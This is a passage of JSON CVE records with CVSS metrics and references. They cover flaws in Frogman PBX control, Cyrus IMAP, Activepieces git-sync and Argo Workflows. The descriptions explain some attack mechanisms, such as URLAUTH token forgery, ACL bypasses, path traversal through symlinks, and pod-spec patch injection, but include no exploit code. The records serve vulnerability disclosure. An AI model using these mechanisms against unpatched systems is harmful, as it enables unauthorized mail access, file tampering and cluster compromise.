1.6.2","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N","baseScore":6.5,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-16T18:40:48.863863Z","id":"CVE-2026-46514","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-532"}]}],"references":[{"url":"https://github.com/mwtcmi/frogman/commit/02203edb613774f265ad8a21d99c4f6cf7de0d4d","source":"security-advisories@github.com"},{"url":"https://github.com/mwtcmi/frogman/releases/tag/v1.6.1","source":"security-advisories@github.com"},{"url":"https://github.com/mwtcmi/frogman/releases/tag/v1.6.2","source":"security-advisories@github.com"},{"url":"https://github.com/mwtcmi/frogman/security/advisories/GHSA-3p65-2prr-cfvf","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-46515","sourceIdentifier":"security-advisories@github.com","published":"2026-07-16T19:16:46.907","lastModified":"2026-07-17T18:04:04.083","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Frogman provides headless PBX control through MCP and HTTP API. Prior to 1.6.3, PERM_READ access was sufficient to call fm_list_managers, fm_list_pinsets, fm_show_context, fm_get_mcp_config, fm_backup_status, fm_whos_calling, fm_run_saved_query, and fm_diagnose_trunk, exposing AMI manager secrets, outbound dial PINs, full Asterisk dialplan context, root SSH connection commands, backup artifact paths, CDR history, arbitrary saved GraphQL query execution, and raw AMI endpoint dumps containing SIP fields such as password, md5_cred, and oauth_secret. This issue is fixed in version 1.6.3."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"mwtcmi","product":"frogman","versions":[{"version":"< 1.6.3","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":9.3,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"LOW","userInteraction":"NONE","vulnConfidentialityImpact":"HIGH","vulnIntegrityImpact":"HIGH","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"HIGH","subIntegrityImpact":"HIGH","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-16T18:29:22.501446Z","id":"CVE-2026-46515","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-862"}]}],"references":[{"url":"https://github.com/mwtcmi/frogman/commit/55ea257d5c24bc01c814a607faa7e76e86b111ec","source":"security-advisories@github.com"},{"url":"https://github.com/mwtcmi/frogman/commit/b8a8bfc12b564bcb77caef952873b9ffd4a98b00","source":"security-advisories@github.com"},{"url":"https://github.com/mwtcmi/frogman/issues/13","source":"security-advisories@github.com"},{"url":"https://github.com/mwtcmi/frogman/issues/25","source":"security-advisories@github.com"},{"url":"https://github.com/mwtcmi/frogman/releases/tag/v1.6.3","source":"security-advisories@github.com"},{"url":"https://github.com/mwtcmi/frogman/security/advisories/GHSA-q4c4-5cr4-8q47","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-47081","sourceIdentifier":"cve@mitre.org","published":"2026-07-16T19:16:48.573","lastModified":"2026-07-17T18:04:04.083","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"An issue was discovered in cyrus-imapd in Cyrus IMAP through 3.12.2. There is an XAPPLEPUSHSERVICE folder existence oracle and push hijack. An authenticated IMAP user could probe for the existence of arbitrary mailboxes on other users' accounts via the XAPPLEPUSHSERVICE command and then create Apple Push Notification Service notifications for new mail in those mailboxes to their own APNS device. This did not leak any data about the content of mailboxes. Instead, a \"mailbox has changed\" notice would be pushed when the mailbox modseq changed."}],"affected":[{"source":"cve@mitre.org","affectedData":[{"vendor":"cyrusimap","product":"Cyrus IMAP","defaultStatus":"unaffected","versions":[{"version":"0","lessThan":"3.12.3","versionType":"semver","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"cve@mitre.org","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N","baseScore":3.1,"baseSeverity":"LOW","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":1.6,"impactScore":1.4}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-16T18:30:07.291411Z","id":"CVE-2026-47081","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"cve@mitre.org","type":"Primary","description":[{"lang":"en","value":"CWE-863"}]}],"references":[{"url":"https://www.cyrusimap.org/3.12/imap/download/release-notes/3.12/x/3.12.3.html","source":"cve@mitre.org"},{"url":"https://www.cyrusimap.org/imap/download/release-notes/index.html","source":"cve@mitre.org"}]}},{"cve":{"id":"CVE-2026-47082","sourceIdentifier":"cve@mitre.org","published":"2026-07-16T19:16:48.713","lastModified":"2026-07-17T18:04:04.083","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"An issue was discovered in cyrus-imapd in Cyrus IMAP through 3.12.2. The vacation \"fcc\" feature skips the destination-mailbox ACL. A user whose vacation Sieve script used :fcc (to save a copy of the sent message) could deliver vacation auto-reply copies into any mailbox the script could name, regardless of whether the script owner had insert permissions on the destination mailbox."}],"affected":[{"source":"cve@mitre.org","affectedData":[{"vendor":"cyrusimap","product":"Cyrus IMAP","defaultStatus":"unaffected","versions":[{"version":"0","lessThan":"3.12.3","versionType":"semver","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"cve@mitre.org","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L","baseScore":5.4,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"LOW","availabilityImpact":"LOW"},"exploitabilityScore":2.8,"impactScore":2.5}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-16T18:48:09.260544Z","id":"CVE-2026-47082","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"cve@mitre.org","type":"Primary","description":[{"lang":"en","value":"CWE-863"}]}],"references":[{"url":"https://www.cyrusimap.org/3.12/imap/download/release-notes/3.12/x/3.12.3.html","source":"cve@mitre.org"},{"url":"https://www.cyrusimap.org/imap/download/release-notes/index.html","source":"cve@mitre.org"}]}},{"cve":{"id":"CVE-2026-47083","sourceIdentifier":"cve@mitre.org","published":"2026-07-16T19:16:48.850","lastModified":"2026-07-17T18:04:04.083","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"An issue was discovered in cyrus-imapd in Cyrus IMAP through 3.12.2. There is an ESEARCH cross-user content oracle. By using the ESEARCH command, an authenticated IMAP user could enumerate folder names under any account they could name. Search would return UIDs of messages matching the search, creating a content oracle (without allowing arbitrary reads of the target's content)."}],"affected":[{"source":"cve@mitre.org","affectedData":[{"vendor":"cyrusimap","product":"Cyrus IMAP","defaultStatus":"unaffected","versions":[{"version":"0","lessThan":"3.12.3","versionType":"semver","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"cve@mitre.org","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N","baseScore":4.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":1.4}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-16T18:51:04.707134Z","id":"CVE-2026-47083","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"cve@mitre.org","type":"Primary","description":[{"lang":"en","value":"CWE-204"}]}],"references":[{"url":"https://www.cyrusimap.org/3.12/imap/download/release-notes/3.12/x/3.12.3.html","source":"cve@mitre.org"},{"url":"https://www.cyrusimap.org/imap/download/release-notes/index.html","source":"cve@mitre.org"}]}},{"cve":{"id":"CVE-2026-47084","sourceIdentifier":"cve@mitre.org","published":"2026-07-16T19:16:48.987","lastModified":"2026-07-17T18:04:04.083","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"An issue was discovered in cyrus-imapd in Cyrus IMAP through 3.12.2. The LOCALDELETE command bypassed ACL checks. An authenticated but non-admin user could invoke the admin-only LOCALDELETE IMAP command and delete mailboxes for which they had no permissions."}],"affected":[{"source":"cve@mitre.org","affectedData":[{"vendor":"cyrusimap","product":"Cyrus IMAP","defaultStatus":"unaffected","versions":[{"version":"0","lessThan":"3.12.3","versionType":"semver","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"cve@mitre.org","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N","baseScore":6.5,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"HIGH","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-16T18:53:21.363420Z","id":"CVE-2026-47084","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"cve@mitre.org","type":"Primary","description":[{"lang":"en","value":"CWE-863"}]}],"references":[{"url":"https://www.cyrusimap.org/3.12/imap/download/release-notes/3.12/x/3.12.3.html","source":"cve@mitre.org"},{"url":"https://www.cyrusimap.org/imap/download/release-notes/index.html","source":"cve@mitre.org"}]}},{"cve":{"id":"CVE-2026-47085","sourceIdentifier":"cve@mitre.org","published":"2026-07-16T19:16:49.120","lastModified":"2026-07-17T18:04:04.083","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"An issue was discovered in cyrus-imapd in Cyrus IMAP through 3.12.2. URLAUTH token forgery can occur via a missing mboxkey. If an attacker knew a folder name on the victim's account for which the victim had never issued an auth URL, they could forge a working URLAUTH token by computing an HMAC-SHA1 value with a predictable key, giving them read access to the mailbox. (URLAUTH is an obscure feature, meaning that the odds of any user actually being susceptible to this attack are very low. Perhaps no public clients use URLAUTH.)"}],"affected":[{"source":"cve@mitre.org","affectedData":[{"vendor":"cyrusimap","product":"Cyrus IMAP","defaultStatus":"unaffected","versions":[{"version":"0","lessThan":"3.12.3","versionType":"semver","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"cve@mitre.org","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N","baseScore":4.0,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"NONE","userInteraction":"NONE","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":2.2,"impactScore":1.4}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-16T18:54:08.396648Z","id":"CVE-2026-47085","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"cve@mitre.org","type":"Primary","description":[{"lang":"en","value":"CWE-340"}]}],"references":[{"url":"https://www.cyrusimap.org/3.12/imap/download/release-notes/3.12/x/3.12.3.html","source":"cve@mitre.org"},{"url":"https://www.cyrusimap.org/imap/download/release-notes/index.html","source":"cve@mitre.org"}]}},{"cve":{"id":"CVE-2026-47086","sourceIdentifier":"cve@mitre.org","published":"2026-07-16T19:16:49.253","lastModified":"2026-07-17T18:04:04.083","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"An issue was discovered in cyrus-imapd in Cyrus IMAP through 3.12.2. GENURLAUTH-issued tokens can bypass ACLs. Any authenticated user could mint a URLAUTH token (via the GENURLAUTH command) for any mailbox they could name, even without read access on it. This would allow reading mail from mailboxes despite having no granted permissions."}],"affected":[{"source":"cve@mitre.org","affectedData":[{"vendor":"cyrusimap","product":"Cyrus IMAP","defaultStatus":"unaffected","versions":[{"version":"0","lessThan":"3.12.3","versionType":"semver","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"cve@mitre.org","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:N/A:N","baseScore":3.5,"baseSeverity":"LOW","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"LOW","userInteraction":"NONE","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":1.8,"impactScore":1.4}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-16T18:46:52.503524Z","id":"CVE-2026-47086","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"cve@mitre.org","type":"Primary","description":[{"lang":"en","value":"CWE-863"}]}],"references":[{"url":"https://www.cyrusimap.org/3.12/imap/download/release-notes/3.12/x/3.12.3.html","source":"cve@mitre.org"},{"url":"https://www.cyrusimap.org/imap/download/release-notes/index.html","source":"cve@mitre.org"}]}},{"cve":{"id":"CVE-2026-47087","sourceIdentifier":"cve@mitre.org","published":"2026-07-16T19:16:49.383","lastModified":"2026-07-17T18:04:04.083","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"An issue was discovered in cyrus-imapd in Cyrus IMAP through 3.12.2. URLAUTH does not honor revoked authorizer access. A URLAUTH URL minted while the authorizer had access continued to work after that access was revoked."}],"affected":[{"source":"cve@mitre.org","affectedData":[{"vendor":"cyrusimap","product":"Cyrus IMAP","defaultStatus":"unaffected","versions":[{"version":"0","lessThan":"3.12.3","versionType":"semver","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"cve@mitre.org","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:N/A:N","baseScore":3.5,"baseSeverity":"LOW","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"LOW","userInteraction":"NONE","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":1.8,"impactScore":1.4}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-16T18:59:40.649418Z","id":"CVE-2026-47087","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"cve@mitre.org","type":"Primary","description":[{"lang":"en","value":"CWE-672"}]}],"references":[{"url":"https://www.cyrusimap.org/3.12/imap/download/release-notes/3.12/x/3.12.3.html","source":"cve@mitre.org"},{"url":"https://www.cyrusimap.org/imap/download/release-notes/index.html","source":"cve@mitre.org"}]}},{"cve":{"id":"CVE-2026-47088","sourceIdentifier":"cve@mitre.org","published":"2026-07-16T19:16:49.513","lastModified":"2026-07-17T18:04:04.083","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"An issue was discovered in cyrus-imapd in Cyrus IMAP through 3.12.2. There is heap exposure in nested MIME comment parsing. An authenticated IMAP user could craft an email message containing an RFC 822 comment ending with a backslash. When parsing the message, the server would read past the message's end in memory, and read into the heap, returning the read content to the user."}],"affected":[{"source":"cve@mitre.org","affectedData":[{"vendor":"cyrusimap","product":"Cyrus IMAP","defaultStatus":"unaffected","versions":[{"version":"0","lessThan":"3.12.3","versionType":"semver","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"cve@mitre.org","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N","baseScore":3.1,"baseSeverity":"LOW","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":1.6,"impactScore":1.4}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-16T19:01:24.459903Z","id":"CVE-2026-47088","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"cve@mitre.org","type":"Primary","description":[{"lang":"en","value":"CWE-126"}]}],"references":[{"url":"https://www.cyrusimap.org/3.12/imap/download/release-notes/3.12/x/3.12.3.html","source":"cve@mitre.org"},{"url":"https://www.cyrusimap.org/imap/download/release-notes/index.html","source":"cve@mitre.org"}]}},{"cve":{"id":"CVE-2026-47089","sourceIdentifier":"cve@mitre.org","published":"2026-07-16T19:16:49.647","lastModified":"2026-07-17T18:04:04.083","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"An issue was discovered in cyrus-imapd in Cyrus IMAP through 3.12.2. LISTRIGHTS os not limited to users with admin access. An authenticated user could call IMAP LISTRIGHTS against any mailbox they could name and learn what principals had what access to it. (This action should have been restricted to users with admin access on the target mailbox.)"}],"affected":[{"source":"cve@mitre.org","affectedData":[{"vendor":"cyrusimap","product":"Cyrus IMAP","defaultStatus":"unaffected","versions":[{"version":"0","lessThan":"3.12.3","versionType":"semver","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"cve@mitre.org","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N","baseScore":4.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":1.4}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-16T19:01:41.402932Z","id":"CVE-2026-47089","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"cve@mitre.org","type":"Primary","description":[{"lang":"en","value":"CWE-862"}]}],"references":[{"url":"https://www.cyrusimap.org/3.12/imap/download/release-notes/3.12/x/3.12.3.html","source":"cve@mitre.org"},{"url":"https://www.cyrusimap.org/imap/download/release-notes/index.html","source":"cve@mitre.org"}]}},{"cve":{"id":"CVE-2026-53535","sourceIdentifier":"security-advisories@github.com","published":"2026-07-16T19:16:50.097","lastModified":"2026-07-17T19:17:16.763","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Activepieces is an open source AI workflow automation platform. Prior to 0.82.0, the git-sync feature clones a user-configured Git repository into a temporary directory on the server and then writes flow, table, and connection state into it before pushing back, and two separate weaknesses allowed those writes to escape the intended workspace and land on arbitrary paths on the host filesystem: Git's symbolic-link handling was not disabled on the clone, so an attacker who controlled the remote repository could include symlinks that redirected the writes, and several user-supplied identifiers used to build on-disk paths (the repository slug and the externalId of tables, flows, and connections) were not validated against directory-traversal sequences such as ../. On a self-hosted Enterprise Edition deployment, a user authorized to configure or push to a git-sync repository (holding the WRITE_PROJECT_RELEASE permission) could cause the server to overwrite files anywhere the Activepieces process user can write, which depending on host layout can be leveraged for tampering, denial of service, or remote code execution. This issue is fixed in version 0.82.0."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"activepieces","product":"activepieces","versions":[{"version":"< 0.82.0","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":5.9,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"PRESENT","privilegesRequired":"HIGH","userInteraction":"NONE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"HIGH","vulnAvailabilityImpact":"HIGH","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T17:15:49.485466Z","id":"CVE-2026-53535","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-22"},{"lang":"en","value":"CWE-59"}]}],"references":[{"url":"https://github.com/activepieces/activepieces/commit/01bd4ef76fc1ad1bf7adc10c39ece4f624da6bf5","source":"security-advisories@github.com"},{"url":"https://github.com/activepieces/activepieces/pull/12711","source":"security-advisories@github.com"},{"url":"https://github.com/activepieces/activepieces/releases/tag/0.82.0","source":"security-advisories@github.com"},{"url":"https://github.com/activepieces/activepieces/security/advisories/GHSA-qqcr-rg2x-97mm","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-54526","sourceIdentifier":"security-advisories@github.com","published":"2026-07-16T19:16:50.373","lastModified":"2026-07-17T18:43:57.990","vulnStatus":"Awaiting Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"Argo Workflows is an open source container-native workflow engine for orchestrating parallel jobs on Kubernetes. Prior to 3.7.15 and 4.0.6, the allow-list fix for CVE-2026-31892 is incomplete because workflow/util/merge.go ValidateUserOverrides and SanitizeUserWorkflowSpec walk only the top-level fields of WorkflowSpec via reflection, and WorkflowSpec.ArtifactGC is allow-listed wholesale; the struct behind that field, WorkflowLevelArtifactGC, has a PodSpecPatch sub-field whose contents flow unmodified into util.ApplyPodSpecPatch on the artifact-GC pod, the same sink the original fix closed for WorkflowSpec.PodSpecPatch, so a user submitting a Workflow under templateReferencing: Strict or Secure (against a referenced WorkflowTemplate that declares an output artifact and setting spec.artifactGC.strategy: OnWorkflowCompletion) can still inject an arbitrary strategic merge patch into the artifact-GC pod, including hostPath volumes, privileged: true, arbitrary image and command, and hostNetwork: true, defeating the stated purpose of Strict/Secure reference mode. This issue is fixed in versions 3.7.15 and 4.0.6."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"argoproj","product":"argo-workflows","versions":[{"version":"< 3.7.15","status":"affected"},{"version":">= 4.0.0, < 4.0.6","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":8.9,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"PRESENT","privilegesRequired":"LOW","userInteraction":"NONE","vulnConfidentialityImpact":"HIGH","vulnIntegrityImpact":"HIGH","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"HIGH","subIntegrityImpact":"HIGH","subAvailabilityImpact":"HIGH","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T13:57:39.248649Z","id":"CVE-2026-54526","options":[{"exploitation":"poc"},{"automatable":"no"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-284"}]}],"references":[{"url":"https://github.com/argoproj/argo-workflows/commit/277e9cef0ad16d7eaaab253573d0695951a65dbd","source":"security-advisories@github.com"},{"url":"https://github.com/argoproj/argo-workflows/commit/358cc3968c8f06f1be0967e41df191088db0b662","source":"security-advisories@github.com"},{"url":"https://github.com/argoproj/argo-workflows/releases/tag/v3.7.15","source":"security-advisories@github.com"},{"url":"https://github.com/argoproj/argo-workflows/releases/tag/v4.0.6","source":"security-advisories@github.com"},{"url":"https://github.com/argoproj/argo-workflows/security/advisories/GHSA-48p8-g2fx-3wwm","source":"security-advisories@github.com"},{"url":"https://github.com/argoproj/argo-workflows/security/advisories/GHSA-48p8-g2fx-3wwm","source":"134c704f-9b21-4f2e-91